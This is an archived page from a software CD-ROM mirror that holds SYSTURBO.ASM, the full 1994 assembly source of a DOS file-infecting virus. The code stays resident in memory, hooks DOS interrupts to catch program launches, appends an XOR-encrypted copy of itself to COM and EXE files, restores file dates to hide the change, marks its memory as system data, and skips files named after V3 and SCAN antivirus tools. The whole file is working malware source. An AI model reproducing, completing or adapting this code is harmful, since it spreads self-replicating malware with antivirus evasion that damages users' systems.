HPAVC

home *** CD-ROM | disk | FTP | other *** search

/ HPAVC / HPAVC CD-ROM.iso / pc / KOREACOL.ZIP / SYSTURBO.ZIP / SYSTURBO.ASM < prev next >

Wrap

Assembly Source File | 1994-08-16 | 23.7 KB | 837 lines

CR EQU 0dh LF EQU 0ah NOP1 EQU 89h,0c0h ;mov ax,ax NOP2 EQU 89h,0dbh ;mov bx,bx NOP3 EQU 89h,0c9h ;mov cx,cx NOP4 EQU 89h,0d2h ;mov dx,dx NOP5 EQU 89h,0f6h ;mov si,si NOP6 EQU 89h,0ffh ;mov di,di NOP7 EQU 83h,0ceh,00h ;or si,00 NOP8 EQU 83h,0cbh,00h ;or bx,00 NOP9 EQU 83h,0c2h,00h ;add dx,00 NOP10 EQU 83h,0e1h,0ffh ;and cx,0ffffh NOP11 EQU 83h,0e5h,0ffh ;and bp,0ffffh BYTESIZE EQU (tail - start) HEADSIZE EQU (offset COM_START - offset start) PARASIZE EQU ((BYTESIZE+0Fh)/10h) GAJASIZE EQU (offset BATE_END - offset BATE1 + 6) ;*********************************************************** ; ; INFECTED FILE'S ROUTINE ( = BATE ) ; ;*********************************************************** code segment assume cs:code,ds:code mov ah,4ch int 21h code ends ;*********************************************************** ; ; ORIGINAL VIRUS ROUTINE ; ;*********************************************************** main segment assume cs:main,ds:main jumps ;TASM special code ;no limitation of start: ;jmp code length call start_point start_point: pop si sub si,3 ;get original start ;pointer mov dx,si mov ax,cs mov ds,ax mov PSP_SEG[si],es mov es,ax add si,HEADSIZE mov di,si mov cx,BYTESIZE-HEADSIZE cld move_loop: ;decode loop lodsb key_value: xor al,00h ;offset for key value stosb loop move_loop mov si,dx jmp check_mem ;jump to program body PSP_SEG dw 0 ;PSP_SEG COM_START db 0e9h ;VIRUS_JUMP_CODE dw 0 EXE_IP dw 0 ;EXE_IP EXE_CS dw 0 ;EXE_CS EXE_SP dw 0fffeh ;EXE_SP EXE_SS dw 0 ;EXE_SS COM_IP dw 100h COM_CS dw 0 SPACE_SEG dw 0 ;SPACE_SEG VIRUS_SEG dw 0 ;VIRUS_SEG FILE_TYPE db 1 ;FILE_TYPE INT21_OFF dw 0 ;INT21_OFF INT21_SEG dw 0 ;INT21_SEG INT1C_OFF dw 0 ;INT1C_OFF INT1C_SEG dw 0 ;INT1C_SEG INT24_OFF dw 0 ;INT24_OFF INT24_SEG dw 0 ;INT24_SEG ALL_BYTE dw BYTESIZE ;ALL_BYTE MARKER dw 0 FILE_NAME dd 0 ;FILE_NAME FILE_SIZE dd 0 ;FILE_SIZE TARGET_FILE1 db 'V3' ;TARGET_FILE1 TARGET_FILE2 db 'SCAN' ;TARGET_FILE2 FILE_HANDLE dw 0 ;FILE_HANDLE FILE_ATTR dw 0 ;FILE_ATTR FILE_DATE dw 0 ;FILE_DATE FILE_TIME dw 0 ;FILE_TIME FILE_NAME_START dw 0 ;COLUMNS_OFF EXE_HEADER db 40h dup (0) ;EXE_HEADER START_POINT2 dw 0 ;END_1 START_POINT1 dw 0 ;END_2 PARAGRAPH dw 0016 ;PARAGRAPH SECTOR dw 0512 ;SECTOR RANDOM1 dw 0 ;RANDOM RANDOM2 dw 0 ;VALUES BATE1 db NOP2,NOP3,NOP1 db NOP8,NOP11 db NOP1,NOP2,NOP3 db NOP9,NOP7 db NOP1,NOP2,NOP3 db NOP10,NOP8 db NOP4,NOP2,NOP5 db NOP7,NOP11 db NOP1,NOP2,NOP6 db NOP11,NOP8 db NOP5,NOP2,NOP6 db NOP9,NOP7 db NOP1,NOP2,NOP3 db NOP8,NOP9 db NOP3,NOP2,NOP4 BATE_END db NOP11,NOP7 check_mem: mov ax,0dcfeh ;check memory to int 21h ;find virus cmp ah,06h jz exe_routine make_tsr: mov es,PSP_SEG[si] mov ah,49h ;release memory int 21h mov bx,0ffffh ;get useful memory mov ah,48h ;size int 21h mov ah,48h ;re-allocation sub bx,(PARASIZE+1)*2+32 jc exe_routine int 21h mov ah,48h ;mem allocation for mov bx,PARASIZE ;virus TSR int 21h mov VIRUS_SEG[si],ax mov ah,48h ;mem allocation for mov bx,PARASIZE+32 ;virus DATA int 21h mov SPACE_SEG[si],ax mov ax,VIRUS_SEG[si] ;force virus to resident dec ax ;in memory mov es,ax mov word ptr es:[01h],08h ;fake system as system data! mov ax,SPACE_SEG[si] ;force virus to resident dec ax ;in memory mov es,ax mov word ptr es:[01h],08h ;fake system as system data! push si mov es,VIRUS_SEG[si] ;move virus program xor di,di ;to the highest mov cx,BYTESIZE ;block cld rep movsb pop si chng_21: mov ax,VIRUS_SEG[si] ;change 21h & 1ch mov es,ax ;interrupts xor ax,ax mov ds,ax mov ax,word ptr ds:[084h] mov es:INT21_OFF,ax mov ax,word ptr ds:[086h] mov es:INT21_SEG,ax cli mov word ptr ds:[84h],offset int_21h mov word ptr ds:[86h],es sti chng_1c: xor ax,ax mov ds,ax mov ax,word ptr ds:[090h] mov es:INT1C_OFF,ax mov ax,word ptr ds:[092h] mov es:INT1C_SEG,ax cli mov word ptr ds:[90h],offset int_1ch mov word ptr ds:[92h],es sti exe_routine: cmp cs:FILE_TYPE[si],0 jz com_routine mov ax,cs:PSP_SEG[si] mov es,ax mov ds,ax add ax,0010h add cs:EXE_CS[si],ax add cs:EXE_SS[si],ax cli mov ss,cs:EXE_SS[si] ;adjust segments for executing mov sp,cs:EXE_SP[si] ;the exe_program sti xor ax,ax xor bx,bx jmp dword ptr cs:EXE_IP[si] com_routine: mov ax,cs mov ds,ax mov es,ax mov COM_CS[si],ax mov bx,si mov ax,offset EXE_HEADER add si,ax mov di,100h movsb movsw mov si,bx xor ax,ax xor bx,bx jmp dword ptr COM_IP[si] int_1ch: jmp dword ptr cs:INT1C_OFF int_24h: xor al,al iret int_21h: pushf cmp ax,4b00h jz gariginal cmp ax,0dcfeh jnz original mov ah,06h popf iret original: popf jmp dword ptr cs:INT21_OFF gariginal: ;ds:dx=file name push ax push bx push cx push dx push ds push es push si push di mov word ptr cs:FILE_NAME[00h],dx mov word ptr cs:FILE_NAME[02h],ds get_drive: cld mov di,dx xor dl,dl cmp byte ptr [di+01],3ah jnz chk_capacity mov dl,[di] and dl,1fh chk_capacity: mov ah,36h int 21h cmp ax,0ffffh jz return_back2 mul bx mul cx or dx,dx jnz capacity_ok cmp ax,BYTESIZE*2 jb return_back2 capacity_ok: mov dx,word ptr cs:FILE_NAME[00h] mov ax,word ptr cs:FILE_NAME[02h] mov ds,ax mov si,ds ;restore DS xor ax,ax mov ds,ax les ax,dword ptr ds:[90h] ;change int 24h mov word ptr cs:INT24_OFF,ax mov word ptr cs:INT24_SEG,es mov word ptr ds:[90h],offset int_24h mov word ptr ds:[92h],cs mov ds,si ;ds:dx=file name xor cx,cx mov ax,4300h ;get file attribute pushf call dword ptr cs:INT21_OFF ;cx=file attribute mov bx,cx and cl,0feh cmp cl,bl je infect_start mov ax,4301h ;set file attribute pushf call dword ptr cs:INT21_OFF jc return_back1 infect_start: push ds push dx push bx mov ax,3d02h ;open file pushf call dword ptr cs:INT21_OFF jc open_error mov bx,ax ;return ax->bx=handle mov cs:FILE_HANDLE,ax call read_handle mov bx,cs:FILE_HANDLE mov ah,3eh ;bx=handle pushf call dword ptr cs:INT21_OFF ;close file open_error: pop cx ;return cx=attribute pop dx pop ds mov ax,4301h ;cx=file attribute pushf call dword ptr cs:INT21_OFF ;change attribute ;ds:dx=file name return_back1: xor ax,ax mov ds,ax mov ax,cs:INT24_OFF mov word ptr ds:[90h],ax ;repair mov ax,cs:INT24_SEG mov word ptr ds:[92h],ax ;int 24h return_back2: pop di pop si pop es pop ds pop dx pop cx pop bx pop ax popf jmp dword ptr cs:INT21_OFF ;*********************************************************** ; ; HANDLE READ ROUTINE ; ;*********************************************************** read_handle proc near mov ax,4200h xor cx,cx xor dx,dx pushf call dword ptr cs:INT21_OFF jc int_error1 mov ax,cs ;handle read mov ds,ax ;into buffer mov es,ax ;named EXE_HEADER mov dx,offset EXE_HEADER mov cx,40h mov ah,3fh pushf call dword ptr cs:INT21_OFF jc int_error1 xor cx,cx ;get real file size xor dx,dx ;and restore return mov ax,4202h ;value pushf call dword ptr cs:INT21_OFF mov word ptr FILE_SIZE[00],ax mov word ptr FILE_SIZE[02],dx cmp ax,BYTESIZE ja check_infect cmp dx,0 je int_error1 check_infect: and ax,000fh cmp ax,0005 jz int_error1 check_exe: cmp word ptr EXE_HEADER,5a4dh jne check_com mov dx,word ptr EXE_HEADER[3ch] mov cx,word ptr EXE_HEADER[3ch+2] mov ax,4200h pushf call dword ptr cs:INT21_OFF mov cx,2 mov dx,offset MARKER mov ah,3fh pushf call dword ptr cs:INT21_OFF cmp word ptr MARKER,454eh ;check windows file jz int_error1 ;don't infect windows mov ax,word ptr EXE_HEADER[04h] ;compute file size cmp word ptr EXE_HEADER[02h],00 ;listed in exe header jz no_dec dec ax no_dec: mul SECTOR ;dx:ax=file size add ax,word ptr EXE_HEADER[02h] ;check overay file adc dx,00h cmp word ptr FILE_SIZE[00h],ax ;if overay file, jnz int_error1 ;exit cmp word ptr FILE_SIZE[02h],dx jnz int_error1 exe_ok: mov FILE_TYPE,1 jmp write_virus check_com: cmp byte ptr EXE_HEADER,0e9h jne int_error1 cmp word ptr FILE_SIZE[00h],0f060h jnb int_error1 mov FILE_TYPE,0 write_virus: lds dx,cs:FILE_NAME mov ax,ds mov es,ax mov di,dx xor al,al mov cx,41h ;search '00h' repnz scasb ;compare al and es:[di] mov si,word ptr cs:FILE_NAME capitalize: ;capitalize mov al,[si] ;for process or al,al jz check_slash cmp al,61h jb inc_si cmp al,7ah ja inc_si sub byte ptr [si],20h inc_si: inc si jmp capitalize check_slash: ;check back slash ;for finding real std ;file pointer mov di,si mov al,5ch mov cx,0041h repnz scasb inc di inc di mov cs:FILE_NAME_START,di cld check_target1: mov si,di mov ax,cs mov es,ax mov di,offset TARGET_FILE1 ;file is V3 ? mov cx,2 repz cmpsb jnz check_target2 jmp int_error1 check_target2: mov cx,4 mov di,offset TARGET_FILE2 ;file is SCAN series ? mov si,cs:FILE_NAME_START repz cmpsb jnz virus_process jmp int_error1 virus_process: mov ax,cs ;cs=ds mov ds,ax ;set register mov ax,40h ;get random value mov es,ax ;in bios area mov ax,word ptr es:[6ch] mov byte ptr key_value[01h],al ;key value fo encode and ax,000fh mov dx,6 ;multiple dx*ax mul dx ;return dx:ax ;restore random*6 mov RANDOM1,ax ;value mov ah,2ch pushf call dword ptr cs:INT21_OFF mov ax,dx and ax,000fh mul PARAGRAPH mov RANDOM2,ax add ax,BYTESIZE mov ALL_BYTE,ax add ALL_BYTE,GAJASIZE mov cx,word ptr FILE_SIZE[02h] mov dx,word ptr FILE_SIZE[00h] and dx,000fh add ALL_BYTE,000fh and ALL_BYTE,0fff0h add ALL_BYTE,5 sub ALL_BYTE,dx mov ax,5700h pushf call dword ptr cs:INT21_OFF mov FILE_DATE,dx mov FILE_TIME,cx cmp FILE_TYPE,1 jz exe_process cmp FILE_TYPE,0 jz com_process jmp int_error1 exe_process: mov ax,word ptr EXE_HEADER[0eh] ;header infomation mov EXE_SS,ax mov ax,word ptr EXE_HEADER[10h] mov EXE_SP,ax mov ax,word ptr EXE_HEADER[14h] mov EXE_IP,ax mov ax,word ptr EXE_HEADER[16h] mov EXE_CS,ax mov ax,word ptr EXE_HEADER[04h] cmp word ptr EXE_HEADER[02h],00 jz no_dec2 dec ax no_dec2: mul SECTOR add ax,word ptr EXE_HEADER[02h] adc dx,00 mov START_POINT2,ax mov START_POINT1,dx add ax,ALL_BYTE adc dx,00 jc int_error1 div SECTOR cmp ax,0400h jae int_error1 cmp dx,0 jz no_inc inc ax no_inc: mov word ptr EXE_HEADER[04h],ax mov word ptr EXE_HEADER[02h],dx mov ax,START_POINT2 mov dx,START_POINT1 div PARAGRAPH sub ax,word ptr EXE_HEADER[08h] ;header size mov word ptr EXE_HEADER[16h],ax ;cs mov word ptr EXE_HEADER[0eh],ax ;ss mov ax,BYTESIZE add ax,GAJASIZE-2 mov word ptr EXE_HEADER[10h],ax ;sp mov word ptr EXE_HEADER[14h],dx ;ip write_header: mov ax,4200h xor cx,cx xor dx,dx pushf call dword ptr cs:INT21_OFF jc int_error1 mov ah,40h mov cx,20h mov dx,offset EXE_HEADER pushf call dword ptr cs:INT21_OFF jc int_error1 jmp virus_to_buffer com_process: mov ax,word ptr FILE_SIZE[00] mov dx,word ptr FILE_SIZE[02] sub ax,3 mov word ptr COM_START[01],ax mov ax,4200h xor cx,cx xor dx,dx pushf call dword ptr cs:INT21_OFF jc int_error1 mov ah,40h mov cx,3 mov dx,offset COM_START pushf call dword ptr cs:INT21_OFF jc int_error1 virus_to_buffer: mov ax,SPACE_SEG mov es,ax xor di,di mov si,offset BATE1 cld mov cx,GAJASIZE rep movsb xor si,si mov cx,HEADSIZE rep movsb mov cx,BYTESIZE-HEADSIZE move_loop2: lodsb xor al,byte ptr key_value[01h] stosb loop move_loop2 buffer_to_file: mov bx,FILE_HANDLE mov ax,4202h xor cx,cx xor dx,dx pushf call dword ptr cs:INT21_OFF mov cx,ALL_BYTE mov dx,RANDOM1 mov ax,es mov ds,ax mov ah,40h pushf call dword ptr cs:INT21_OFF repair_date: mov ax,5701h mov dx,cs:FILE_DATE mov cx,cs:FILE_TIME pushf call dword ptr cs:INT21_OFF int_error1: retn read_handle endp stack_space dw 32 dup (?) tail label byte main ends stac segment para stack 'stack' db 100 dup (0) stac ends end start